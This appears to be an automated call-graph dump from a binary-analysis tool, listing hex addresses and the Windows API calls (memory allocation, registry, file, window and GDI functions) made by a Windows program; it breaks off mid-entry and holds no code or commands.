11852->11853 11854 6c7c9f21 11852->11854 11855 6c7c9f4f 11853->11855 11856 6c7c9f3c GetCurrentThreadId 11853->11856 11854->11838 11855->11838 11856->11855 11858 6c7c970f 11857->11858 11859 6c7c975d 11858->11859 11860 6c7c973e 11858->11860 11861 6c7c9735 Sleep 11858->11861 11859->11843 11862 6c7c974d Sleep 11860->11862 11863 6c7c9756 SwitchToThread 11860->11863 11861->11859 11862->11859 11863->11859 11865 6c7c9cb1 11864->11865 11866 6c7c9c6a 11864->11866 11865->11849 11866->11865 11867 6c7c9c98 Sleep 11866->11867 11867->11866 11873 6c7c98c8 GetCurrentThreadId 11868->11873 11870 6c7c9bf7 11871 6c7c9c58 Sleep 11870->11871 11872 6c7c9c23 11870->11872 11871->11872 11872->11833 11874 6c7c98d5 11873->11874 11874->11870 12325 6c9257c3 12326 6c9257cc 12325->12326 12331 6c925774 12325->12331 12328 6c7c9c34 25 API calls 12326->12328 12327 6c87a41c 75 API calls 12327->12331 12329 6c9257e6 12328->12329 12330 6c8f7da0 5 API calls 12330->12331 12331->12325 12331->12327 12331->12330 12332 6c9258f4 98 API calls 12331->12332 12334 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 12331->12334 12332->12331 12334->12331 12335 6c876fd2 12336 6c876fed 12335->12336 12337 6c877090 12336->12337 12339 6c8b4788 12336->12339 12340 6c8b4798 12339->12340 12342 6c8b47ab 12340->12342 12343 6c8b2d7c 12340->12343 12342->12336 12347 6c8b2d89 12343->12347 12344 6c8b2d99 12352 6c8b66c0 12344->12352 12347->12344 12349 6c7eff2c 12347->12349 12350 6c7ca504 11 API calls 12349->12350 12351 6c7eff36 12350->12351 12351->12347 12353 6c7cdf8c 60 API calls 12352->12353 12354 6c8b2de1 12353->12354 12354->12342 12559 6c7d2ae8 12560 6c7d2b13 12559->12560 12561 6c7d2b84 RaiseException 12560->12561 12570 6c7d2bac 12560->12570 12578 6c7d2c19 12561->12578 12562 6c7d2c4c 12565 6c7d2c9b 12562->12565 12566 6c7d2c50 GetLastError 12562->12566 12563 6c7d2c41 LoadLibraryA 12563->12562 12564 6c7d2d4b 12569 6c7d2d4f GetLastError 12564->12569 12564->12578 12575 6c7d2cdc FreeLibrary 12565->12575 12576 6c7d2ca9 12565->12576 12571 6c7d2c61 12566->12571 12567 6c7d2d3f GetProcAddress 12567->12564 12568 6c7d2cbf 12568->12564 12568->12567 12568->12578 12572 6c7d2d60 12569->12572 12570->12562 12570->12563 12570->12568 12570->12578 12571->12565 12574 6c7d2c73 RaiseException 12571->12574 12573 6c7d2d72 RaiseException 12572->12573 12572->12578 12573->12578 12574->12578 12575->12568 12576->12568 12577 6c7d2caf LocalAlloc 12576->12577 12577->12568 11875 6c92d584 11876 6c92d5b3 11875->11876 11881 6c925744 11876->11881 11891 6c87ae78 11881->11891 11883 6c9257cc 11913 6c7c9c34 11883->11913 11888 6c925754 11888->11883 11897 6c87a41c 11888->11897 11901 6c8f7da0 EnterCriticalSection 11888->11901 11905 6c9258f4 11888->11905 11912 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 11888->11912 11892 6c87ae89 11891->11892 11919 6c7c9cd8 11892->11919 11895 6c7c9a54 13 API calls 11896 6c87ae9f 11895->11896 11896->11888 11898 6c87a429 11897->11898 11899 6c87a438 11897->11899 11988 6c87a32c 11898->11988 11899->11888 11902 6c8f7dcd 11901->11902 11903 6c8f7dd4 LeaveCriticalSection 11901->11903 12016 6c8f7cf8 EnterCriticalSection LeaveCriticalSection EnterCriticalSection 11902->12016 11906 6c925926 11905->11906 11907 6c9258fd 11905->11907 11906->11888 12017 6c8f8dfc 11907->12017 11912->11888 11914 6c7c9c40 11913->11914 11915 6c7c9cd8 23 API calls 11914->11915 11916 6c7c9c4e 11915->11916 11917 6c7c9bec 2 API calls 11916->11917 11918 6c7c9c53 11917->11918 11920 6c7c9d24 11919->11920 11921 6c7c9cf4 11919->11921 11920->11895 11926 6c7c98e0 11921->11926 11924 6c7c9d1d 11935 6c7c5f88 11924->11935 11927 6c7c98e9 11926->11927 11929 6c7c98ee 11926->11929 11955 6c7c97c0 GetModuleHandleW GetProcAddress 11927->11955 11930 6c7c991c 11929->11930 11931 6c7c9928 11929->11931 11961 6c7c6498 11930->11961 11932 6c7c6498 10 API calls 11931->11932 11934 6c7c9926 11932->11934 11934->11920 11934->11924 11936 6c7c5f9d 11935->11936 11937 6c7c6080 11935->11937 11938 6c7c5fa3 11936->11938 11943 6c7c601a Sleep 11936->11943 11937->11938 11939 6c7c5a14 11937->11939 11940 6c7c5fac 11938->11940 11946 6c7c605e Sleep 11938->11946 11949 6c7c6095 11938->11949 11941 6c7c617a 11939->11941 11942 6c7c5964 2 API calls 11939->11942 11940->11920 11941->11920 11944 6c7c5a25 11942->11944 11943->11938 11945 6c7c6034 Sleep 11943->11945 11947 6c7c5a3b VirtualFree 11944->11947 11948 6c7c5a55 11944->11948 11945->11936 11946->11949 11950 6c7c6074 Sleep 11946->11950 11951 6c7c5a4c 11947->11951 11948->11951 11952 6c7c5a5e VirtualQuery VirtualFree 11948->11952 11953 6c7c6114 VirtualFree 11949->11953 11954 6c7c60b8 11949->11954 11950->11938 11951->11920 11952->11948 11952->11951 11953->11920 11954->11920 11956 6c7c97e8 GetLogicalProcessorInformation 11955->11956 11960 6c7c9834 11955->11960 11957 6c7c97fb GetLastError 11956->11957 11956->11960 11958 6c7c9805 11957->11958 11957->11960 11959 6c7c980d GetLogicalProcessorInformation 11958->11959 11959->11960 11960->11929 11964 6c7c5c04 11961->11964 11963 6c7c64a4 11963->11934 11965 6c7c5e64 11964->11965 11968 6c7c5c1c 11964->11968 11966 6c7c5f7c 11965->11966 11967 6c7c5e28 11965->11967 11969 6c7c5f85 11966->11969 11970 6c7c59b0 VirtualAlloc 11966->11970 11974 6c7c5e42 Sleep 11967->11974 11980 6c7c5e82 11967->11980 11977 6c7c5c2e 11968->11977 11979 6c7c5cb9 Sleep 11968->11979 11969->11963 11972 6c7c59eb 11970->11972 11973 6c7c59db 11970->11973 11971 6c7c5c3d 11971->11963 11972->11963 11975 6c7c5964 2 API calls 11973->11975 11978 6c7c5e58 Sleep 11974->11978 11974->11980 11975->11972 11976 6c7c5d1c 11985 6c7c58e8 VirtualAlloc 11976->11985 11987 6c7c5d28 11976->11987 11977->11971 11977->11976 11982 6c7c5cfd Sleep 11977->11982 11978->11967 11979->11977 11981 6c7c5ccf Sleep 11979->11981 11983 6c7c58e8 VirtualAlloc 11980->11983 11984 6c7c5ea0 11980->11984 11981->11968 11982->11976 11986 6c7c5d13 Sleep 11982->11986 11983->11984 11984->11963 11985->11987 11986->11977 11987->11963 11989 6c7d17ac 64 API calls 11988->11989 11990 6c87a36a 11989->11990 11993 6c7eff74 11990->11993 11994 6c7eff80 11993->11994 11997 6c7e9cd0 11994->11997 11996 6c7effad 12000 6c7e9cf8 11997->12000 12003 6c7e9d28 12000->12003 12002 6c7e9cf0 12002->11996 12004 6c7e9d31 12003->12004 12007 6c7e9d91 12004->12007 12009 6c7e9be0 12004->12009 12006 6c7e9df8 12006->12002 12007->12006 12008 6c7e9be0 75 API calls 12007->12008 12008->12007 12012 6c7ea080 12009->12012 12013 6c7ea0da 12012->12013 12015 6c7ea0d3 12012->12015 12014 6c7e9b64 75 API calls 12014->12015 12015->12013 12015->12014 12016->11903 12018 6c8f8e0c 12017->12018 12020 6c8f8e17 12017->12020 12018->12020 12028 6c8f8d9c 12018->12028 12021 6c87b070 12020->12021 12022 6c87ae78 36 API calls 12021->12022 12023 6c87b085 12022->12023 12032 6c87a66c 12023->12032 12026 6c7c9c34 25 API calls 12027 6c87b0ba 12026->12027 12029 6c8f8da7 12028->12029 12030 6c8f8df1 12028->12030 12029->12030 12031 6c8f8dbb SelectObject SelectObject SelectObject 12029->12031 12030->12020 12031->12030 12033 6c87a677 12032->12033 12034 6c87a686 12033->12034 12036 6c87a28c 12033->12036 12034->12026 12037 6c87a297 12036->12037 12038 6c87a32c 75 API calls 12037->12038 12039 6c87a2ab 12037->12039 12038->12039 12039->12034 12355 6c8fddd7 12356 6c8fdde0 12355->12356 12362 6c8fdd88 12355->12362 12357 6c7c9c34 25 API calls 12356->12357 12360 6c8fddfa 12357->12360 12358 6c87a41c 75 API calls 12358->12362 12359 6c8f7da0 5 API calls 12359->12362 12360->12360 12362->12355 12362->12358 12362->12359 12364 6c8fdef4 12362->12364 12378 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 12362->12378 12365 6c8fdf09 12364->12365 12377 6c8fdf89 12364->12377 12379 6c8f7cf8 EnterCriticalSection LeaveCriticalSection EnterCriticalSection 12365->12379 12367 6c8fdf11 12368 6c8fdf29 SelectObject 12367->12368 12369 6c8fdf36 12367->12369 12368->12369 12370 6c8fdf4f 12369->12370 12371 6c8fdf40 SelectPalette 12369->12371 12372 6c8f8dfc 3 API calls 12370->12372 12371->12370 12373 6c8fdf5f DeleteDC 12372->12373 12374 6c87b070 94 API calls 12373->12374 12375 6c8fdf74 12374->12375 12380 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 12375->12380 12377->12362 12378->12362 12379->12367 12380->12377 12040 6c7fd564 12043 6c7fd550 12040->12043 12042 6c7fd56a 12044 6c7fd55d 12043->12044 12045 6c7fd557 12043->12045 12048 6c7fd4b8 12044->12048 12045->12042 12047 6c7fd562 12047->12042 12049 6c7fd4c6 VariantClear 12048->12049 12051 6c7fd4d3 12048->12051 12050 6c7fd4d1 12049->12050 12050->12047 12051->12050 12052 6c7fd53e VariantClear VariantInit 12051->12052 12052->12050 12738 6c9d5440 12739 6c7cc6e4 16 API calls 12738->12739 12740 6c9d545b 12739->12740 12381 6c9d58c3 12383 6c9d58d0 12381->12383 12397 6c9d5990 12381->12397 12384 6c9d5927 12383->12384 12385 6c8b2c8c 64 API calls 12383->12385 12386 6c7cce8c 49 API calls 12384->12386 12385->12384 12387 6c9d594a 12386->12387 12389 6c7cce8c 49 API calls 12387->12389 12390 6c9d5961 12389->12390 12395 6c7cc6e4 16 API calls 12390->12395 12395->12397 12401 6c881884 12397->12401 12402 6c88188d 12401->12402 12405 6c8818c8 12402->12405 12406 6c8818e3 12405->12406 12407 6c88198e 12406->12407 12408 6c881910 12406->12408 12432 6c7e8814 12407->12432 12428 6c7e886c 12408->12428 12411 6c881998 12412 6c7e9678 2 API calls 12411->12412 12416 6c88198c 12411->12416 12414 6c8819b3 GetLastError 12412->12414 12413 6c88192d 12415 6c7e9678 2 API calls 12413->12415 12413->12416 12417 6c7ee5b8 2 API calls 12414->12417 12418 6c88194c GetLastError 12415->12418 12419 6c8819cc 12417->12419 12420 6c7ee5b8 2 API calls 12418->12420 12421 6c7f0148 75 API calls 12419->12421 12422 6c881965 12420->12422 12423 6c8819ee 12421->12423 12424 6c7f0148 75 API calls 12422->12424 12425 6c7ca504 11 API calls 12423->12425 12426 6c881987 12424->12426 12425->12416 12427 6c7ca504 11 API calls 12426->12427 12427->12416 12429 6c7e88ba 12428->12429 12430 6c7e8882 12428->12430 12429->12413 12431 6c7e88b4 CreateFileW 12430->12431 12431->12429 12433 6c7e8868 12432->12433 12434 6c7e882a 12432->12434 12433->12411 12434->12433 12435 6c7e8862 CreateFileW 12434->12435 12435->12433 12053 6c9d5abd 12054 6c9d5add 12053->12054 12055 6c9d5ac6 12053->12055 12065 6c7f9368 12054->12065 12056 6c7f0074 64 API calls 12055->12056 12058 6c9d5ad8 12056->12058 12060 6c7ca504 11 API calls 12058->12060 12059 6c9d5ae2 12069 6c7f91a0 12059->12069 12060->12054 12062 6c9d5b09 12064 6c9d5b14 12062->12064 12093 6c8df9d0 12062->12093 12066 6c7f937d 12065->12066 12067 6c7f9371 12065->12067 12066->12059 12096 6c7f97f0 12067->12096 12071 6c7f91bd 12069->12071 12070 6c7f91e1 12072 6c7f9209 12070->12072 12110 6c7f0148 12070->12110 12071->12070 12074 6c7f0074 64 API calls 12071->12074 12073 6c7f9231 12072->12073 12076 6c7f0148 75 API calls 12072->12076 12081 6c7f9266 12073->12081 12084 6c7f0148 75 API calls 12073->12084 12077 6c7f91dc 12074->12077 12080 6c7f922c 12076->12080 12082 6c7ca504 11 API calls 12077->12082 12083 6c7ca504 11 API calls 12080->12083 12116 6c7f8a28 12081->12116 12082->12070 12083->12073 12086 6c7f9261 12084->12086 12088 6c7ca504 11 API calls 12086->12088 12088->12081 12089 6c7f0074 64 API calls 12090 6c7f9290 12089->12090 12092 6c7ca504 11 API calls 12090->12092 12091 6c7f9295 12091->12062 12092->12091 12134 6c7e88c0 12093->12134 12097 6c7f97f6 12096->12097 12100 6c7f9464 12097->12100 12099 6c7f9814 12099->12066 12101 6c7f9470 12100->12101 12102 6c7f948a 12101->12102 12103 6c7f9480 GetACP 12101->12103 12104 6c7f948d GetCPInfo 12102->12104 12103->12104 12105 6c7f94aa 12104->12105 12108 6c7f94c1 12104->12108 12106 6c7f0074 64 API calls 12105->12106 12107 6c7f94bc 12106->12107 12109 6c7ca504 11 API calls 12107->12109 12108->12099 12109->12108 12111 6c7f0156 12110->12111 12112 6c7d17ac 64 API calls 12111->12112 12113 6c7f0180 12112->12113 12114 6c7e9cd0 75 API calls 12113->12114 12115 6c7f018e 12114->12115 12117 6c7f8a39 12116->12117 12118 6c7f8a54 12116->12118 12117->12118 12120 6c7f0074 64 API calls 12117->12120 12119 6c7f8a81 12118->12119 12121 6c7f0148 75 API calls 12118->12121 12122 6c7f8aa9 12119->12122 12125 6c7f0148 75 API calls 12119->12125 12123 6c7f8a4f 12120->12123 12124 6c7f8a7c 12121->12124 12126 6c7f8adf 12122->12126 12130 6c7f0148 75 API calls 12122->12130 12127 6c7ca504 11 API calls 12123->12127 12128 6c7ca504 11 API calls 12124->12128 12129 6c7f8aa4 12125->12129 12126->12089 12126->12091 12127->12118 12128->12119 12131 6c7ca504 11 API calls 12129->12131 12132 6c7f8ada 12130->12132 12131->12122 12133 6c7ca504 11 API calls 12132->12133 12133->12126 12135 6c7e88e6 12134->12135 12142 6c7e8959 12134->12142 12135->12142 12143 6c7e8a14 12135->12143 12144 6c7ce254 60 API calls 12143->12144 12145 6c7e8a4b 12144->12145 12146 6c7ce254 60 API calls 12145->12146 12147 6c7e8a66 12146->12147 12166 6c7e8cf8 12147->12166 12151 6c7e8b14 12188 6c7f06bc 12151->12188 12152 6c7e8a82 12152->12151 12155 6c7e8ac5 GetVolumeInformationW 12152->12155 12157 6c7e8b0f 12155->12157 12161 6c7e8ad1 GetDriveTypeW 12155->12161 12159 6c7f304c 78 API calls 12157->12159 12158 6c7e8af7 12162 6c7ce378 16 API calls 12158->12162 12159->12151 12161->12158 12163 6c7e8b4f 12162->12163 12164 6c7ce378 16 API calls 12163->12164 12165 6c7e8b5d 12164->12165 12167 6c7cbab4 12166->12167 12168 6c7e8d0b GetFileAttributesW 12167->12168 12169 6c7e8d1a 12168->12169 12170 6c7e8a75 12168->12170 12169->12170 12171 6c7e8d33 CreateFileW 12169->12171 12172 6c7e8d61 12169->12172 12170->12152 12177 6c7e8c60 12170->12177 12171->12170 12173 6c7e8d50 CloseHandle 12171->12173 12172->12170 12174 6c7e8d6d CreateFileW 12172->12174 12173->12170 12175 6c7e8d8a CloseHandle 12174->12175 12176 6c7e8d94 12174->12176 12175->12170 12176->12170 12178 6c7cbab4 12177->12178 12179 6c7e8c6e GetFileAttributesW 12178->12179 12180 6c7e8cca GetLastError 12179->12180 12181 6c7e8c7b 12179->12181 12183 6c7e8cd6 12180->12183 12187 6c7e8c84 12180->12187 12182 6c7e8c90 CreateFileW 12181->12182 12181->12187 12184 6c7e8caa CloseHandle 12182->12184 12185 6c7e8cb4 GetLastError 12182->12185 12183->12187 12192 6c7e8c20 12183->12192 12184->12187 12185->12187 12187->12152 12189 6c7f06c8 12188->12189 12190 6c7d17ac 64 API calls 12189->12190 12191 6c7f06f2 12190->12191 12193 6c7cbab4 12192->12193 12194 6c7e8c3a FindFirstFileW 12193->12194 12195 6c7e8c57 12194->12195 12196 6c7e8c45 FindClose 12194->12196 12195->12187 12196->12195 12741 6c9d4f7f 12810 6c9d2b6c 12741->12810 12746 6c9d2b2c 64 API calls 12747 6c9d4fba 12746->12747 12748 6c9d2b2c 64 API calls 12747->12748 12749 6c9d4fce 12748->12749 12750 6c9d2b2c 64 API calls 12749->12750 12751 6c9d4fe2 12750->12751 12752 6c9d2b6c 64 API calls 12751->12752 12753 6c9d4ff5 12752->12753 12754 6c9d2b6c 64 API calls 12753->12754 12755 6c9d5008 12754->12755 12756 6c9d2b6c 64 API calls 12755->12756 12757 6c9d501b 12756->12757 12758 6c9d2b6c 64 API calls 12757->12758 12759 6c9d502e 12758->12759 12760 6c9d2b2c 64 API calls 12759->12760 12761 6c9d5044 12760->12761 12762 6c9d2b2c 64 API calls 12761->12762 12763 6c9d505a 12762->12763 12764 6c9d2b2c 64 API calls 12763->12764 12765 6c9d5070 12764->12765 12766 6c9d2b2c 64 API calls 12765->12766 12767 6c9d5084 12766->12767 12768 6c9d2b2c 64 API calls 12767->12768 12769 6c9d5098 12768->12769 12770 6c9d2b6c 64 API calls 12769->12770 12771 6c9d50ab 12770->12771 12772 6c9d2b6c 64 API calls 12771->12772 12773 6c9d50be 12772->12773 12774 6c9d50d4 12773->12774 12818 6c9d2ab4 12773->12818 12776 6c9d50ea 12774->12776 12777 6c9d2ab4 80 API calls 12774->12777 12778 6c9d2ab4 80 API calls 12776->12778 12780 6c9d4efd 12776->12780 12777->12776 12778->12780 12779 6c9d4f2c 12782 6c7cce8c 49 API calls 12779->12782 12780->12779 12781 6c8b2c8c 64 API calls 12780->12781 12787 6c9d4f75 12780->12787 12781->12779 12783 6c9d4f49 12782->12783 12784 6c7cce8c 49 API calls 12783->12784 12785 6c9d4f5a 12784->12785 12786 6c7cc6e4 16 API calls 12785->12786 12786->12787 12788 6c9d52cf 12787->12788 12789 6c7ce254 60 API calls 12787->12789 12790 6c9d2b6c 64 API calls 12788->12790 12789->12788 12791 6c9d5303 12790->12791 12792 6c9d2b2c 64 API calls 12791->12792 12793 6c9d531a 12792->12793 12794 6c9d2b2c 64 API calls 12793->12794 12795 6c9d5331 12794->12795 12796 6c9d2b2c 64 API calls 12795->12796 12797 6c9d5348 12796->12797 12798 6c9d2b2c 64 API calls 12797->12798 12799 6c9d535f 12798->12799 12800 6c9d2b6c 64 API calls 12799->12800 12801 6c9d5375 12800->12801 12802 6c9d2b6c 64 API calls 12801->12802 12803 6c9d538b 12802->12803 12804 6c9d2b2c 64 API calls 12803->12804 12805 6c9d53a2 12804->12805 12806 6c9d2ab4 80 API calls 12805->12806 12807 6c9d53c2 12805->12807 12806->12807 12824 6c8b48dc 12807->12824 12809 6c9d53fa 12811 6c9d2b85 12810->12811 12812 6c9d2b9e 12811->12812 12813 6c7f0074 64 API calls 12811->12813 12814 6c9d2b2c 12812->12814 12813->12812 12815 6c9d2b46 12814->12815 12816 6c9d2b5f 12815->12816 12817 6c7f0074 64 API calls 12815->12817 12816->12746 12817->12816 12819 6c9d2ac9 12818->12819 12820 6c9d2afd 12819->12820 12821 6c7f0074 64 API calls 12819->12821 12822 6c7ce378 16 API calls 12820->12822 12821->12820 12823 6c9d2b1d 12822->12823 12829 6c8b67a0 12824->12829 12827 6c8b66c0 60 API calls 12828 6c8b48f1 12827->12828 12828->12809 12830 6c8b67aa 12829->12830 12831 6c8b67af 12829->12831 12832 6c8b2c8c 64 API calls 12830->12832 12833 6c8b67c7 12831->12833 12834 6c8b66c0 60 API calls 12831->12834 12832->12831 12835 6c8b48e8 12833->12835 12837 6c8b4e34 12833->12837 12834->12833 12835->12827 12838 6c8b4e4c 12837->12838 12839 6c8b2c8c 64 API calls 12838->12839 12840 6c8b4e6d 12838->12840 12839->12840 12840->12835 11228 6c7cead0 11229 6c7ceafd 11228->11229 11230 6c7ceade 11228->11230 11230->11229 11233 6c7cea88 11230->11233 11234 6c7cea98 GetModuleFileNameW 11233->11234 11235 6c7ceab4 11233->11235 11237 6c7cfd48 GetModuleFileNameW 11234->11237 11238 6c7cfd96 11237->11238 11243 6c7cfc20 11238->11243 11247 6c7cfc41 11243->11247 11244 6c7cfcc9 11246 6c7cfcb6 11248 6c7cfcbc 11246->11248 11249 6c7cfccb GetUserDefaultUILanguage 11246->11249 11247->11244 11261 6c7cf934 11247->11261 11250 6c7cfa68 FindFirstFileW FindClose 11248->11250 11251 6c7cf2cc 17 API calls 11249->11251 11250->11244 11252 6c7cfcd8 11251->11252 11253 6c7cfa68 FindFirstFileW FindClose 11252->11253 11254 6c7cfce5 11253->11254 11255 6c7cfd0d 11254->11255 11256 6c7cfcf3 GetSystemDefaultUILanguage 11254->11256 11255->11244 11257 6c7cfb50 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW 11255->11257 11258 6c7cf2cc 17 API calls 11256->11258 11257->11244 11259 6c7cfd00 11258->11259 11260 6c7cfa68 FindFirstFileW FindClose 11259->11260 11260->11255 11262 6c7cf956 11261->11262 11265 6c7cf968 11261->11265 11267 6c7cf614 11262->11267 11268 6c7cf631 11267->11268 11269 6c7cf65a 11268->11269 11270 6c7cf645 GetModuleFileNameW 11268->11270 11271 6c7cf682 RegOpenKeyExW 11269->11271 11274 6c7cf81f 11269->11274 11270->11269 11272 6c7cf6a9 RegOpenKeyExW 11271->11272 11273 6c7cf743 11271->11273 11272->11273 11275 6c7cf6c7 RegOpenKeyExW 11272->11275 11288 6c7cf414 GetModuleHandleW 11273->11288 11275->11273 11277 6c7cf6e5 RegOpenKeyExW 11275->11277 11277->11273 11279 6c7cf703 RegOpenKeyExW 11277->11279 11278 6c7cf75f RegQueryValueExW 11280 6c7cf779 11278->11280 11281 6c7cf7a6 RegQueryValueExW 11278->11281 11279->11273 11282 6c7cf721 RegOpenKeyExW 11279->11282 11286 6c7cf781 RegQueryValueExW 11280->11286 11283 6c7cf7a4 11281->11283 11284 6c7cf7c2 11281->11284 11282->11273 11282->11274 11285 6c7cf80c RegCloseKey 11283->11285 11287 6c7cf7ca RegQueryValueExW 11284->11287 11285->11274 11286->11283 11287->11283 11289 6c7cf43c GetProcAddress 11288->11289 11290 6c7cf44f 11288->11290 11289->11290 11293 6c7cf45f 11290->11293 11296 6c7cf4bd 11290->11296 11300 6c7cf3f0 11290->11300 11293->11278 11294 6c7cf3f0 CharNextW 11294->11296 11295 6c7cf3f0 CharNextW 11295->11296 11296->11293 11296->11295 11297 6c7cf542 FindFirstFileW 11296->11297 11299 6c7cf5ac lstrlenW 11296->11299 11297->11293 11298 6c7cf55e FindClose lstrlenW 11297->11298 11298->11293 11298->11296 11299->11296 11301 6c7cf3fe 11300->11301 11302 6c7cf40c 11301->11302 11303 6c7cf3f6 CharNextW 11301->11303 11302->11293 11302->11294 11303->11301 12436 6c9832f6 12438 6c983305 12436->12438 12437 6c983382 12438->12437 12440 6c98333a 12438->12440 12442 6c7e75c0 12438->12442 12440->12437 12441 6c8b4788 60 API calls 12440->12441 12441->12437 12443 6c7e75cb 12442->12443 12444 6c7e75d7 12442->12444 12447 6c7e76c8 12443->12447 12444->12438 12450 6c7e7684 12447->12450 12449 6c7e75d4 12449->12438 12451 6c7e7692 12450->12451 12452 6c7e76b3 CompareStringW 12451->12452 12452->12449 12841 6c9d5c72 12847 6c9d5c7b 12841->12847 12842 6c9d5d84 12843 6c9d5dbc 12842->12843 12844 6c8b2c8c 64 API calls 12842->12844 12845 6c7cce8c 49 API calls 12843->12845 12844->12843 12846 6c9d5ddf 12845->12846 12848 6c7cc6e4 16 API calls 12846->12848 12847->12842 12849 6c7ce254 60 API calls 12847->12849 12850 6c9d5e10 12848->12850 12852 6c9d5cdb 12849->12852 12851 6c7f0074 64 API calls 12851->12852 12852->12842 12852->12851 12853 6c7ca504 11 API calls 12852->12853 12853->12852 12453 6c805ff0 12454 6c80600d 12453->12454 12455 6c805ff6 12453->12455 12457 6c7fde24 12455->12457 12458 6c7fde32 12457->12458 12461 6c7fde4a 12457->12461 12459 6c7fde3c 12458->12459 12460 6c7fde5b 12458->12460 12459->12461 12463 6c7fd4b8 3 API calls 12459->12463 12464 6c7fdd08 12460->12464 12461->12454 12463->12461 12465 6c7fdd1a 12464->12465 12466 6c7fdd21 12464->12466 12467 6c7fd4b8 3 API calls 12465->12467 12468 6c7fdd35 VariantCopy 12466->12468 12469 6c7fdd4a 12466->12469 12467->12466 12471 6c7fdd45 12468->12471 12470 6c7fde0d VariantCopy 12469->12470 12469->12471 12470->12471 12471->12461 12583 6c8f9a3d 12589 6c8f92f0 12583->12589 12586 6c8f915c 77 API calls 12587 6c8f9ab3 12586->12587 12588 6c8f9ad1 DeleteObject 12587->12588 12590 6c8f92fd CreateDIBitmap 12589->12590 12590->12586 12201 6c9d5ea9 12202 6c9d5eb6 12201->12202 12219 6c9d5fd5 12201->12219 12203 6c7e8c60 7 API calls 12202->12203 12205 6c9d5ec0 12203->12205 12204 6c7cc6e4 16 API calls 12208 6c9d602b 12204->12208 12205->12219 12223 6c9d294c 12205->12223 12208->12208 12209 6c9d5f47 12210 6c9d5f7f 12209->12210 12212 6c8b2c8c 64 API calls 12209->12212 12213 6c7cce8c 49 API calls 12210->12213 12212->12210 12215 6c9d5fa2 12213->12215 12217 6c7cc6e4 16 API calls 12215->12217 12217->12219 12219->12204 12224 6c9d2982 12223->12224 12225 6c9d29ae 12224->12225 12262 6c7eba98 12224->12262 12225->12209 12227 6c8dfb74 12225->12227 12278 6c8dfc9c 12227->12278 12263 6c7ebaf8 12262->12263 12264 6c7ebaac 12262->12264 12263->12225 12264->12263 12266 6c7eba18 12264->12266 12269 6c7eb990 12266->12269 12270 6c7eb99a 12269->12270 12272 6c7eb9d1 12270->12272 12273 6c7e70ac 12270->12273 12272->12263 12274 6c7f0148 75 API calls 12273->12274 12275 6c7e70c5 12274->12275 12276 6c7ca504 11 API calls 12275->12276 12277 6c7e70ca 12276->12277 12277->12272 12279 6c8dfca9 12278->12279 12280 6c8dfb9d 12279->12280 12281 6c8e0788 CompareStringW 12279->12281 12286 6c8e0610 12280->12286 12282 6c8dfcb9 12281->12282 12282->12280 12283 6c7f06bc 64 API calls 12282->12283 12284 6c8dfcf1 12283->12284 12285 6c7ca504 11 API calls 12284->12285 12285->12280 12287 6c8e0637 12286->12287 12288 6c8e0460 CompareStringW 12287->12288 12289 6c8e0650 12287->12289 12290 6c8e0647 12288->12290 12292 6c8e070c 12290->12292 12293 6c8e0719 12292->12293 12294 6c8e0460 CompareStringW 12293->12294 12295 6c8e072c 12293->12295 12294->12295 12295->12289 11193 6c7c5c04 11194 6c7c5e64 11193->11194 11197 6c7c5c1c 11193->11197 11195 6c7c5f7c 11194->11195 11196 6c7c5e28 11194->11196 11198 6c7c5f85 11195->11198 11199 6c7c59b0 VirtualAlloc 11195->11199 11203 6c7c5e42 Sleep 11196->11203 11209 6c7c5e82 11196->11209 11206 6c7c5c2e 11197->11206 11208 6c7c5cb9 Sleep 11197->11208 11201 6c7c59eb 11199->11201 11202 6c7c59db 11199->11202 11200 6c7c5c3d 11217 6c7c5964 11202->11217 11207 6c7c5e58 Sleep 11203->11207 11203->11209 11205 6c7c5d1c 11216 6c7c5d28 11205->11216 11222 6c7c58e8 11205->11222 11206->11200 11206->11205 11211 6c7c5cfd Sleep 11206->11211 11207->11196 11208->11206 11210 6c7c5ccf Sleep 11208->11210 11212 6c7c58e8 VirtualAlloc 11209->11212 11213 6c7c5ea0 11209->11213 11210->11197 11211->11205 11215 6c7c5d13 Sleep 11211->11215 11212->11213 11215->11206 11218 6c7c59ac 11217->11218 11219 6c7c596d 11217->11219 11218->11201 11219->11218 11220 6c7c5978 Sleep 11219->11220 11220->11218 11221 6c7c5992 Sleep 11220->11221 11221->11219 11226 6c7c587c 11222->11226 11224 6c7c58f1 VirtualAlloc 11225 6c7c5908 11224->11225 11225->11216 11227 6c7c581c 11226->11227 11227->11224 12591 6c8f6634 12592 6c8f663a 12591->12592 12594 6c8f664a 12591->12594 12593 6c8f6644 DeleteObject 12592->12593 12592->12594 12593->12594 11304 6cd3d12c 11307 6c9db850 11304->11307 11308 6c9db859 11307->11308 11362 6c9db2f4 11308->11362 11310 6c9db8b4 11368 6c9db7d0 FindWindowW 11310->11368 11314 6c9db8c1 11315 6c9db8dc 11314->11315 11316 6c7cabbc 11 API calls 11314->11316 11317 6c9db784 2 API calls 11315->11317 11316->11315 11318 6c9db8e4 11317->11318 11319 6c9db8ff 11318->11319 11320 6c7cabbc 11 API calls 11318->11320 11321 6c9db784 2 API calls 11319->11321 11320->11319 11322 6c9db907 11321->11322 11323 6c9db922 11322->11323 11375 6c7cabbc 11322->11375 11325 6c9db7d0 2 API calls 11323->11325 11326 6c9db927 11325->11326 11387 6c7f1e34 11326->11387 11328 6c9db956 11329 6c9db7d0 FindWindowW ShowWindow 11328->11329 11330 6c9db966 11329->11330 11331 6c7e8cf8 GetFileAttributesW CreateFileW CloseHandle CreateFileW CloseHandle 11330->11331 11332 6c9db993 11331->11332 11333 6c9db997 11332->11333 11337 6c9db9ac 11332->11337 11334 6c956b50 220 API calls 11333->11334 11335 6c9db9a5 11334->11335 11336 6c7cabbc 11 API calls 11335->11336 11338 6c9db9aa 11336->11338 11339 6c7e979c CreateDirectoryW 11337->11339 11340 6c9db7d0 FindWindowW ShowWindow 11338->11340 11339->11338 11341 6c9db9dc 11340->11341 11342 6c9db2f4 79 API calls 11341->11342 11343 6c9dba17 11342->11343 11344 6c9db784 GetSystemDefaultLangID VerLanguageNameW 11343->11344 11345 6c9dba27 11344->11345 11346 6c9db4d4 22 API calls 11345->11346 11347 6c9dba42 Sleep Sleep 11346->11347 11348 6c7e837c 75 API calls 